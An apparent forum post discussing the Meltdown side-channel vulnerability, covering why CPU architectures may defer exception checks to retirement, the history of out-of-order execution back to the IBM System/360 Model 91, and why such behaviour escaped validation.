Correct. Which is what makes Apple's disclosure especially interesting.
It seems like it's almost a coin-flip as to whether an architecture would defer exception detection in total or not to the retirement stage, and any number of factors could push things in one direction or another.
Simply continuing with what works while more pressing matters in other areas are in flux could have made a decision set down before this could even be a concern take on new significance.
The rough model used to explain the initial description of what became Meltdown cited Tomasulo's Algorithm as an explanatory device, an OoOE method that was built into an IBM System/360 Model 91 computer with no caches.
For context, it was just barely newer than the Model 85, which is credited with having the first cache of any kind, and a little before virtual memory managed with paging was considered a proven tech.
I'm not sure what sort of validation people are asserting has been skipped, particularly if it turns out that a notable subset of high-performance architectures may have some avenue for Meltdown. If it's the sort of validation I'm thinking of, it would never be caught because what we're seeing has been up until now not been defined as incorrect.
A bunch of architectures are likely in the basket of not being able to do a thing which I'm not sure is all that laudable, much like how I am not good enough to fail to gain control over a caught ball before being brought to the ground in the Superbowl and so should not be praised over a receiver who almost had a reception in the Superbowl.
The side-channel attack is a holistic threat that leverages the behaviors of multiple architectural features, many of those behaviors not considered part of the software-visible semantics of an architecture. A lot of blocks that evolved to be agnostic to details best handled by someone else, and in eras where no one could present a sane reason as to why a given predictor, cache, or pipeline would be de-tuned so as to lie or obfuscate about what it or something else was doing--especially not when the things were barely within human understanding to begin with.
Given the complexity and demands on virtual memory (with page-controlled permissions in particular) and TLBs, I think it's also the case that it hasn't always been clear which path was the right one.
Even now, I'm not sure if halting speculation on these conditions is the only way to go about doing things, or without cost.